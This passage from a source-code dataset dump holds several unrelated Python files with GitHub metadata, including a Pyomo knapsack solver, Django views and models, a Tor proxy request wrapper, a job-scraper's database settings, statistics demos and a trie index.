np.asarray([[1,0,0], [0,0,1]]), epochs=10)
model.save('readme_example_model.h5', include_optimizer=False)
|
[
"editgym@gmail.com"
] |
editgym@gmail.com
|
6a61782fcfd4338c981fee4050af6ec266ed0558
|
86cdb209d9dd3dda040ca5469b68000a0d5c311a
|
/RobustIntegerKnapsackModel.py
|
086075eae4cb3fe0070696265153dd96db6164d7
|
[] |
no_license
|
ToledanoDiego/KnapsackProblem
|
40c9dd9d86036756e09cdc8a5006ede526378565
|
67ef1eb817eb65a180ba4b5c9fcb9a2694fba030
|
refs/heads/main
| 2023-08-19T03:48:13.440723
| 2021-10-04T14:55:37
| 2021-10-04T14:55:37
| 413,455,572
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,536
|
py
|
"""A Pyomo representation of the Robust Integer Knapsack Problem.
Run the Integer Knapsack Problem with instances found in Instances/
and write results into RobustIntegerKnapsackSolution.txt.
Typical usage example:
python3 RobustIntegerKnapsackModel.py
"""
import random
import pyomo.environ as pyo
from pyomo.environ import *
import pyomo.kernel as pmo
import os
import warnings
import time
time_start = time.perf_counter()
warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore")
counter = 0
for filename in os.listdir('Instances'):
time_start = time.perf_counter()
file = open('Instances/' + filename, "r")
content = file.read()
data = content.splitlines()
index = []
profit = []
nominalWeight = []
robustWeight = []
solId = []
numberOfItems = int(data[0])
data.pop(0)
capacityOfKnapsack = int(data[-1])
data.pop(-1)
for item in data:
index.append(int(item.split()[0]) + 1)
profit.append(int(item.split()[1]))
nominalWeight.append(int(item.split()[2]))
robustWeight.append(int(item.split()[3]))
v = {index[i]: profit[i] for i in range(len(index))}
w = {index[i]: nominalWeight[i] for i in range(len(index))}
r = {index[i]: nominalWeight[i] + 10 / 100 * nominalWeight[i] for i in range(len(index))}
Gamma = int(10 / 100 * len(r))
tmp = random.sample(range(numberOfItems), Gamma)
tmp = [i + 1 for i in tmp]
for i in range(len(r)):
if i not in tmp:
r[i] = 0
M = ConcreteModel() # Pyomo.
M.ITEMS = Set(initialize=v.keys())
M.x = Var(M.ITEMS, within=pmo.NonNegativeIntegers)
M.value = Objective(expr=sum(v[i] * M.x[i] for i in M.ITEMS), sense=maximize)
M.weight = Constraint(expr=sum((w[i] + r[i]) * M.x[i] for i in M.ITEMS) <= capacityOfKnapsack)
S = pyo.SolverFactory('cplex')
results = S.solve(M)
sol = 0
for i in M.component_objects(Var, active=True):
for index in i:
sol = sol + i[index].value * v[index]
if i[index].value > 0:
for j in range(int(i[index].value)):
solId.append(index)
time_elapsed = (time.perf_counter() - time_start)
f = open("RobustIntegerKnapsackSolutions.txt", "a")
f.write(str(filename) + '|' + str(sol) + '|' + str(time_elapsed) + '|' + str(solId) + '\n')
counter = counter + 1
print(counter)
|
[
"noreply@github.com"
] |
noreply@github.com
|
3a0f200b06d77ef08f908fd0474fe8e95f74cb21
|
b68fea9d645de59ee31da970d3dc435460fde9de
|
/discussboard/views_edit.py
|
a7cc8324343a334ab42398e43c09249b9d270868
|
[
"BSD-3-Clause"
] |
permissive
|
shagun30/djambala-2
|
03fde4d1a5b2a17fce1b44f63a489c30d0d9c028
|
06f14e3dd237d7ebf535c62172cfe238c3934f4d
|
refs/heads/master
| 2021-01-10T04:20:30.735479
| 2008-05-22T05:02:08
| 2008-05-22T05:02:08
| 54,959,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,026
|
py
|
# -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. enthaelt den View zum Aendern der Eigenschaften des Diskussionsforums
Django content Management System
Hans Rauch
hans.rauch@gmx.net
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 Beginn der Arbeit
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
""" Eigenschaften des Ordners aendern """
params = request.GET.copy()
profi_mode = params.has_key('profi')
@transaction.commit_manually
def save_values(item_container, old, new):
""" Abspeichern der geaenderten Werte """
item_container.container.save_values(old, new)
item_container.item.save_values(old, new)
item_container.save_modified_values(old, new)
transaction.commit()
class dms_itemForm ( forms.Form ) :
title = forms.CharField(max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
nav_title = forms.CharField(max_length=60,
widget=forms.TextInput(attrs={'size':30}) )
sub_title = forms.CharField(required=False, max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
text = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
'style':'width:100%;'}) )
text_more = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
'style':'width:100%;'}) )
image_url = forms.CharField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_url_url = forms.URLField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_extern = forms.BooleanField(required=False)
is_wide = forms.BooleanField(required=False)
is_important = forms.BooleanField(required=False)
if profi_mode:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
else:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
section = forms.CharField(required=False,
widget=forms.Select(choices=get_parent_section_choices(item_container),
attrs={'size':4, 'style':'width:40%'} ) )
has_user_support = forms.BooleanField(required=False)
has_comments = forms.BooleanField(required=False)
is_moderated = forms.BooleanField(required=False)
is_browseable = forms.BooleanField(required=False)
visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
show_next = forms.BooleanField(required=False)
integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
app_name = 'discussboard'
my_title = _(u'Diskussionsforum ändern')
data_init = {
'title' : decode_html(item_container.item.title),
'nav_title' : decode_html(item_container.container.nav_title),
'sub_title' : item_container.item.sub_title,
'text' : remove_link_icons(item_container.item.text),
'text_more' : remove_link_icons(item_container.item.text_more),
'image_url' : item_container.item.image_url,
'image_url_url' : item_container.item.image_url_url,
'image_extern' : item_container.item.image_extern,
'is_wide' : item_container.item.is_wide,
'is_important' : item_container.item.is_important,
'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
'section' : decode_html(item_container.section),
'has_comments' : item_container.item.has_comments,
'has_user_support': item_container.item.has_user_support,
'is_moderated' : item_container.item.is_moderated,
'is_browseable' : item_container.is_browseable,
'visible_start' : item_container.visible_start,
'visible_end' : item_container.visible_end,
'integer_4' : item_container.item.integer_4
}
if request.method == 'POST' :
data = request.POST.copy ()
else :
data = data_init
f = dms_itemForm ( data )
# --- Reihenfolge, Ueberschriften, Hilfetexte // Sonderfall: Startseite
tabs = [
('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
'is_wide', 'is_important']),
('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
('tab_frame' , ['info_slot_right',]),
('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
]
content = get_tabbed_form(tabs, help_form, app_name ,f)
if request.method == 'POST' and not f.errors :
save_values(item_container, data_init, f.data)
return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
else :
vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
return render_to_response ( 'app/base_edit.html', vars )
|
[
"hans.rauch@gmx.net"
] |
hans.rauch@gmx.net
|
b34142bcca93eb06ac562fb0d801305f7e0c5f00
|
dd4ccdb4ba014abad82270a428a2819d7ccb82f6
|
/statuses/__init__.py
|
73d87732bf2d073aff0ce0cfa4abf2c271015977
|
[] |
no_license
|
Takinado/rbu
|
3c122eeb0262a38fb6ee459022d0135e839b56ca
|
99f55085fd664657cee05631c426362e877e1439
|
refs/heads/master
| 2020-03-07T14:09:11.966479
| 2018-03-31T09:39:42
| 2018-03-31T09:39:42
| 127,519,823
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53
|
py
|
default_app_config = "statuses.apps.StatusAppConfig"
|
[
"takinado@mail.ru"
] |
takinado@mail.ru
|
deb4be375223c47ca23cf76acf8592ff12a33e4b
|
6430d2572c4d6dfe41e0e30e725271444cc6f675
|
/torsurvey/torapi.py
|
6a8d9874f0eeda2ccf1457658601340cd0f124c6
|
[] |
no_license
|
nikcub/torsurvey
|
5a0c36560801862d5cf1c74f362ae013e0458f27
|
6e9ce5793694857dd5c451905a4a7aa773bfd2b6
|
refs/heads/master
| 2016-09-05T10:47:13.578465
| 2015-01-27T15:37:07
| 2015-01-27T15:37:07
| 26,388,609
| 1
| 1
| null | 2015-01-27T15:37:07
| 2014-11-09T07:18:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
#!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
headers = {
'User-Agent' : 'torsurvey-',
}
tor_host = None
tor_port = None
proxy_tor = {
"http": "socks5://127.0.0.1:9030",
"https": "socks5://127.0.0.1:9030"
}
def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.timeout = timeout
self.proxy = {}
self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.session = requesocks.session()
self.session.proxies = self.proxy
logging.debug("Established session with proxies %s" % str(self.proxy))
def get_ip(self):
r = self.req('http://ifconfig.me/ip')
if r.status_code == 200:
return r.text
return 'Error'
def get_headers(self):
headers = self.headers
# @TODO add headers
return headers
def req(self, url, extras={}):
try:
r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
return r
except requesocks.exceptions.ConnectionError, e:
logging.error("Bad connection cannot connect to %s" % url)
return -1
except Exception, e:
logging.error("%s: %s" % (url, e))
return -1
|
[
"nikcub@gmail.com"
] |
nikcub@gmail.com
|
99cc6f137b9f513dd32357037e6f41e2231fad35
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/itsm/project/models/base.py
|
747edf57e059aed9c831fc4991b3f24c7f758c0a
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836
| 2023-08-22T08:17:54
| 2023-08-22T08:17:54
| 391,839,825
| 100
| 86
|
MIT
| 2023-09-14T08:24:54
| 2021-08-02T06:35:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,045
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-ITSM 蓝鲸流程服务 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-ITSM 蓝鲸流程服务 is licensed under the MIT License.
License for BK-ITSM 蓝鲸流程服务:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.db import models
from django.utils.translation import ugettext as _
from itsm.component.constants import LEN_NORMAL
class Model(models.Model):
FIELDS = ('creator', 'create_at', 'updated_by', 'update_at')
creator = models.CharField(_("创建人"), max_length=LEN_NORMAL, null=True, blank=True)
create_at = models.DateTimeField(_("创建时间"), auto_now_add=True)
update_at = models.DateTimeField(_("更新时间"), auto_now=True)
updated_by = models.CharField(_("修改人"), max_length=LEN_NORMAL, null=True, blank=True)
class Meta:
app_label = 'project'
abstract = True
|
[
"1758504262@qq.com"
] |
1758504262@qq.com
|
74044ba31aee8febadeb0b5bdf8ad33d30405070
|
575bdfbcc1eef8a0c38b60292dc992aa3e9dab90
|
/2_Regression/Simple_Linear_Regression.py
|
11da5c04873b45adc42f921c7dfcf874c0f31693
|
[] |
no_license
|
saimahesh-geek/machine-learning
|
36ffce0cd08f4046e52f28ca8b0e9329d6346239
|
ca5ccea924c5cce9ae8046b139d80b4a661accdb
|
refs/heads/master
| 2020-04-05T22:21:31.637849
| 2018-11-19T09:44:04
| 2018-11-19T09:44:04
| 157,253,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
#Importing libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#Importing datasets
dataset = pd.read_csv('Salary_Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
#Splitting the dataset into training and test sets
#cross_validation - deprecated
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)
#Fitting Simple Linear Regression to the training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
#Predicting the test set results
y_pred = regressor.predict(X_test)
#Visualising the training set results
plt.scatter(X_train, y_train, color = 'red')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary VS Experience (Training Set)')
plt.xlabel('Years of experience')
plt.ylabel('Salary')
plt.show()
#Visualising the test set results
plt.scatter(X_test, y_test, color = 'red')
plt.scatter(X_test, y_pred, color = 'yellow')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary VS Experience (Test Set)')
plt.xlabel('Years of experience')
plt.ylabel('Salary')
plt.show()
|
[
"saimahesh.cse@gmail.com"
] |
saimahesh.cse@gmail.com
|
052c5c207307bbe9f26b006dfb64a5119f43a3fe
|
d1a7899f6d7e791a9886a7b32d573263a45713ad
|
/apps/staff/views.py
|
b7252543cbc5066672071587c46e942b2ae99d20
|
[] |
no_license
|
ranjitreonard/hospital_project
|
bac01437cb5ad6c4a18cfe78f8912f9210df2c18
|
10cdcac28d2c7add2c0878d80bfb90c91a2d5c2f
|
refs/heads/main
| 2023-01-11T04:16:27.817128
| 2020-11-12T17:56:39
| 2020-11-12T17:56:39
| 303,461,061
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,445
|
py
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from django.utils import timezone
from django.views.generic import CreateView
from pip._vendor.urllib3.util import request
from apps.management.forms import LeavePeriodForm
from apps.management.models import Complaint
from apps.staff.models import Leave
@login_required()
def dashboard(request):
return render(request=request, template_name='staff/dashboard.html')
@login_required()
def add_complaint(request):
complaints = request.POST.get('complaints')
all_complaints = Complaint.objects.all()
context = {
'all_complaints': all_complaints
}
if request.method == 'POST':
my_complaint = Complaint.objects.create(
complaint=complaints,
created_by=request.user,
status='Pending',
# created_at=timezone.now(),
)
# complaints.complaint.add(my_complaint)
my_complaint.save()
return render(request, 'staff/complaint.html', context=context)
def cancel_complaint(request, id):
complaint = Complaint.objects.get(id=id)
if complaint.status == 'Pending':
complaint.status = 'Canceled'
complaint.save()
return redirect(reverse_lazy('staff:add-complaint'))
|
[
"ranjitreonard@gmail.com"
] |
ranjitreonard@gmail.com
|
b1ab51beb86bb85dddf16a4de946d7f4359aa706
|
db24cc07c4bcc000c3643e13bfb55e08c255548f
|
/plugins/Metro_2033.py
|
d055d6da6a762a512c8a30ccfbc110f23335cb13
|
[
"MIT"
] |
permissive
|
Pr0Ger/SGSB
|
40db6b7b02557956a535e6afb26b62b218158162
|
6adf8dc7ce3bf3d4b84f46b7d97aad376440e175
|
refs/heads/master
| 2021-01-21T04:54:00.149185
| 2016-05-03T10:40:07
| 2016-05-03T10:40:07
| 9,470,033
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
import os
from lib.base_plugin import BasePlugin
from lib.paths import MyDocumentsPath, SteamGamesPath, SteamCloudPath
class Metro2033Plugin(BasePlugin):
Name = "Metro 2033"
support_os = ["Windows"]
def backup(self, _):
_.add_folder('Saves', os.path.join(MyDocumentsPath, '4a games'), 'metro 2033')
_.add_files('Config', os.path.join(SteamCloudPath, '43110', 'remote'), 'user.cfg')
def restore(self, _):
_.restore_folder('Saves', os.path.join(MyDocumentsPath, '4a games'), 'metro 2033')
_.restore_files('Config', os.path.join(SteamCloudPath, '43110', 'remote'), 'user.cfg')
def detect(self):
if os.path.isdir(os.path.join(SteamGamesPath, 'metro 2033')):
return True
return False
|
[
"git@pr0ger.org"
] |
git@pr0ger.org
|
91ada6f45a09b8402b1495832eadc2d12fdfc6e7
|
196d79948210027c00405788fe913fec58e304fb
|
/Correlated_normal_random_numbers.py
|
4cb1a324de31d1c1eda2b46897e5bd88e0e7e72a
|
[] |
no_license
|
Mazumsad/Python-Programs
|
b5f4bcfb58c4c557d63f7e9dc11519a2f23c91ed
|
8698f1b373493f330b6aa971534abaa2d8464732
|
refs/heads/main
| 2023-07-02T22:36:39.300498
| 2021-08-09T09:13:16
| 2021-08-09T09:13:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,458
|
py
|
# Correlated normal random numbers
#
# Author: Oscar A. Nieves
# Last updated: July 01, 2021
import matplotlib.pyplot as plt
import numpy as np
plt.close('all')
np.random.seed(0) # Set seed
# Inputs
samples = 1000
# Random samples (Uniformly distributed)
U1 = np.random.rand(samples,1)
U2 = np.random.rand(samples,1)
# Random samples (normally distributed uncorrelated)
S1 = np.sqrt(-2*np.log(U1))*np.cos(2*np.pi*U2)
S2 = np.sqrt(-2*np.log(U1))*np.sin(2*np.pi*U2)
E_S1 = np.mean(S1)
Var_S1 = np.mean(S1**2) - E_S1**2
sigma_S1 = np.sqrt(Var_S1)
E_S2 = np.mean(S2)
Var_S2 = np.mean(S2**2) - E_S2**2
sigma_S2 = np.sqrt(Var_S2)
Cov_S1_S2 = np.mean(S1*S2) - E_S1*E_S2
Corr_S1_S2 = Cov_S1_S2/sigma_S1/sigma_S2
print('corr(S1,S2) = ' + str(Corr_S1_S2))
# Correlated random samples
mu_x = 0.5
mu_y = 0.66
sigma_x = 0.85
sigma_y = 1.24
rho = 0.5
X = mu_x + sigma_x * S1
Y = mu_y + sigma_y * (rho*S1 + np.sqrt(1-rho**2)*S2)
E_X = np.mean(X)
Var_X = np.mean(X**2) - E_X**2
sigma_X = np.sqrt(Var_X)
E_Y = np.mean(Y)
Var_Y = np.mean(Y**2) - E_Y**2
sigma_Y = np.sqrt(Var_Y)
Cov_X_Y = np.mean(X*Y) - E_X*E_Y
Corr_X_Y = Cov_X_Y/sigma_X/sigma_Y
print('corr(X,Y) = ' + str(Corr_X_Y))
# Generate plots
plt.subplot(1,2,1)
plt.plot(S1,S2,linestyle="",marker="o",color="blue")
plt.xlabel('S1', fontsize=16)
plt.ylabel('S2', fontsize=16)
plt.subplot(1,2,2)
plt.plot(X,Y,linestyle="",marker="o",color="green")
plt.xlabel('X', fontsize=16)
plt.ylabel('Y', fontsize=16)
|
[
"noreply@github.com"
] |
noreply@github.com
|
1fe65d81b9ace7330b0e75a717eac734837ec34a
|
c3a16bebf2d2df1cef785ab8821d1e55a2c7781a
|
/LagouSpider-master/Config/settings.py
|
182e9ab46b1a73a4b0be0d41b346ac66c65a827b
|
[] |
no_license
|
lailaizhou/Python-
|
b1459b18fb1717e9db0dd06bf85d9e4beb1f4b4d
|
44092c899b73a8fcab4eb54b524a01ecd6369412
|
refs/heads/master
| 2023-02-12T08:23:26.079521
| 2021-01-10T07:54:01
| 2021-01-10T07:54:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,075
|
py
|
import pymysql
import redis
from pymysql.err import Warning
'''
1. 指定:数据库名、表名、是否去重(数据库、表不存在时,自动创建)
2. 在__init__配置mysql和redis数据库,默认本地数据库、root、密码123456
'''
class Settings(object):
DATABASE_NAME = 'test' # 数据库名
TABLE_NAME = 'it' # 表名
DONT_FILTER = False # 是否对已经爬取过的url进行过滤,默认False过滤,改为True则不过滤
SHOW_WINDOWS = False
SPEED = 1
executable_path = 'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'
START = True
def __init__(self):
if self.START:
# 用于存储数据mysql数据库
self.mysql_conn = pymysql.Connection(
host='localhost',
port=3306,
user='root',
password='123456',
database=None,
charset='utf8',
)
# 新建数据库和表
self.create_db_and_table()
self.mysql_conn.select_db(self.DATABASE_NAME)
# 去重的数据库
# 连接本地Redis数据库1,不填则默认为0
self.redis_db = redis.StrictRedis(host='127.0.0.1', port=6379, db=1)
self.START = False
def create_db_and_table(self):
cs = self.mysql_conn.cursor()
create_db_sql = f'create database IF NOT EXISTS {self.DATABASE_NAME};'
user_db = f'use {self.DATABASE_NAME};'
create_table_sql = f'''create table IF NOT EXISTS {self.TABLE_NAME}(
id int primary key auto_increment,
# 搜索信息
keywords varchar(20), # 职位搜索关键字
detail_url varchar(100), # 招聘详细页网址
# 岗位相关信息
position varchar(40), # 职位名称(如:Python开发,Python实习生)
tags varchar(50), # 职位标签(如:电商|后端|大数据|数据挖掘|机器学习|HTML|CSS|Python)
salary varchar(10), # 职位薪资范围(如:7K-10K,10K-20K)
job_type varchar(10), # 工作性质(如:全职,实习,兼职)
city varchar(10), # 工作地点(如:北京-海淀,浙江-杭州)
district varchar(10), # 工作区域
street varchar(40), # 详细街道
education varchar(10), # 学历要求(如:初中及以下,高中/中技/中专,大专,本科,硕士,博士,无学历要求)
work_experience varchar(10), # 工作经验要求(如:在校生/应届生,1-3年,3-5年,无经验)
release_date varchar(12), # 发布日期(如:2020-1-20)
description varchar(2000), # 职位描述
# 公司相关信息
company_name varchar(40), # 招聘公司名称
company_scale varchar(20), # 公司规模(如:少于15人,15-50人)
company_field varchar(20), # 公司领域(如:互联网,金融,电子商务)
company_type varchar(10), # 公司性质(如:民营公司,上市公司,C轮,未融资)
company_benefits varchar(100) # 公司福利(如:行业领先,技术氛围浓,绩效奖金;五险一金,员工旅游,专业培训,年终奖金,弹性工作,定期体检)
);'''
try:
cs.execute(create_db_sql)
except Warning:
print(f"{self.DATABASE_NAME} 数据库已经存在========")
cs.execute(user_db)
try:
cs.execute(create_table_sql)
except Warning:
print(f"{self.TABLE_NAME} 表已经存在========")
self.mysql_conn.commit()
# print(create_table_sql)
def get_mysql_connect(self):
return self.mysql_conn
def get_redis_connect(self):
return self.redis_db
def db_exists(self, cursor, db_name):
pass
def tabel_exists(self, cursor, table_name):
pass
|
[
"jixingjiukeyile@163.com"
] |
jixingjiukeyile@163.com
|
4f9cf6f9574426479a9b31ac6a3141432a6b3254
|
57aa5d223e03cd4776b24fd5abddebd5e088b8f6
|
/djapi/deploy/migrations/0009_auto_20180525_1612.py
|
dee8ba7607a5ce4dad41782314cbc75cb8432f9e
|
[] |
no_license
|
uahoo/hasan
|
5308e231fa531431029d0ed07693128c76324fa1
|
b6ad10103ee09ab9de3b29c9bb20a98a56585206
|
refs/heads/master
| 2020-06-30T07:37:56.698144
| 2018-06-05T09:53:16
| 2018-06-05T09:53:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2018-05-25 08:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('deploy', '0008_auto_20180424_1627'),
]
operations = [
migrations.RemoveField(
model_name='deployinfo',
name='deploy_ip',
),
migrations.AddField(
model_name='deployinfo',
name='desc',
field=models.CharField(max_length=124, null=True),
),
migrations.AddField(
model_name='deployinfo',
name='host',
field=models.CharField(max_length=125, null=True),
),
migrations.AddField(
model_name='deployinfo',
name='status',
field=models.BooleanField(default=False),
),
]
|
[
"xiaofangliu2012@126.com"
] |
xiaofangliu2012@126.com
|
e5f464aed684607088c0c6db4c09487c67a66592
|
13661160ec486aff1f3a6c56ddf397b665397d9d
|
/babu/indexing.py
|
da49ecd461403780562e36155acdd50290ddf7fe
|
[] |
no_license
|
xaviermathew/Babu
|
3ed0464cd90276b471d5c7326d07b475d5f8803b
|
e953c3c2e80309918d0159fd93216bd3a4012ad2
|
refs/heads/master
| 2021-06-08T20:25:25.735180
| 2016-10-31T20:50:02
| 2016-10-31T20:50:02
| 72,604,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,016
|
py
|
import ctypes
import string
CHARSET = string.ascii_letters + string.digits
class DataPointerArray(ctypes.Array):
_length_ = 10
_type_ = ctypes.c_int
class IndexPointerArray(ctypes.Array):
_length_ = len(CHARSET)
_type_ = ctypes.c_int
class Page(ctypes.Structure):
_fields_ = [
('curr', ctypes.c_char),
('data_ptrs', DataPointerArray),
('index_ptrs', IndexPointerArray),
('next_ptr', ctypes.c_int)
]
def goto(self, char):
idx = CHARSET.index(char)
node_ptr = self.index_ptrs[idx]
if node_ptr:
return BLOCK.pages[node_ptr]
def next(self):
ptr = self.next_ptr
if ptr:
return BLOCK.pages[ptr]
def add_data_ptr(self, data_ptr):
ptrs = self.data_ptrs
for i, p in enumerate(ptrs):
if not p:
break
ptrs[i] = data_ptr
class Pages(ctypes.Array):
_type_ = Page
_length_ = 1000
class Block(ctypes.Structure):
_fields_ = [
('free', ctypes.c_char),
('pages', Pages),
]
@property
def root(self):
return self.pages[0]
def add_page(self, page):
if not self.free:
self.free = 1
self.pages[self.free] = page
BLOCK = None
class FieldIndex(object):
max_depth = 3
def __init__(self, field):
self.field = field
self.model = field.model
self.index_name = '%s.%s.index' % (self.model.name, self.field.name)
# self.init_index()
def create_index(self):
from babu.utils import pack_struct
s = pack_struct(Pages())
block_file = open(self.index_name, 'w')
block_file.write(s)
block_file.close()
def init_index(self):
import mmap
from babu.storage import ProgrammingError
global BLOCK
try:
block_file = open(self.index_name, 'r+b')
except IOError:
raise ProgrammingError
block_buffer = mmap.mmap(block_file.fileno(), 0)
BLOCK = Block.from_buffer(block_buffer)
self.block = BLOCK
def find(self, needle):
node = self.block.root
for char in needle[:self.max_depth]:
node = node.goto(char)
if node is None:
break
if node:
return node.data_ptrs
def add_to_index(self, instance):
value = getattr(instance, self.field.name)
block = self.block
node = block.root
for depth, char in enumerate(value[:self.max_depth]):
_node = node.goto(char)
node.add_data_ptr(instance.pk)
if _node:
node = _node
else:
break
if depth < self.max_depth:
for char in value[depth:self.max_depth]:
page = Page(curr=char, data_ptrs=DataPointerArray(instance.pk))
block.add_page(page)
def remove_from_index(self, instance):
raise NotImplementedError
|
[
"xavier@compile.com"
] |
xavier@compile.com
|
ae07df2f81bfe910c4ffcfe06f600297235bb252
|
c822c6a8941cda6b31b9505372f02b528fed8767
|
/pledge/manage.py
|
4a5058efe7eab9d9020ac60938e874aef65b13ca
|
[] |
no_license
|
asim3/kfupm-pledge
|
b39944c87032325890a1c80ac602bbb12a7e7f58
|
6108a067b225aeeaaff7d82c616099ef5820b3ca
|
refs/heads/main
| 2023-03-08T04:33:28.801450
| 2021-02-17T10:09:45
| 2021-02-17T10:09:45
| 319,908,595
| 0
| 0
| null | 2020-12-19T21:05:44
| 2020-12-09T09:38:57
|
Python
|
UTF-8
|
Python
| false
| false
| 662
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pledge.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"asimwebapps@gmail.com"
] |
asimwebapps@gmail.com
|
cdbc14cffaa1c039b8eb98564019e47d62004cce
|
df2ee1c167b4bfe492fd1d89ce9790ba467d59f4
|
/getTemp.py
|
330d46ba80ebff7932ee272c9dbdd76b763ddfb8
|
[] |
no_license
|
KamillB/IoTRPI
|
c8eed980162c032f6106fc692e3909baf64dce9c
|
80919742b4e3557c6939513e79bcbbfcb368ec99
|
refs/heads/master
| 2020-03-21T11:08:15.961327
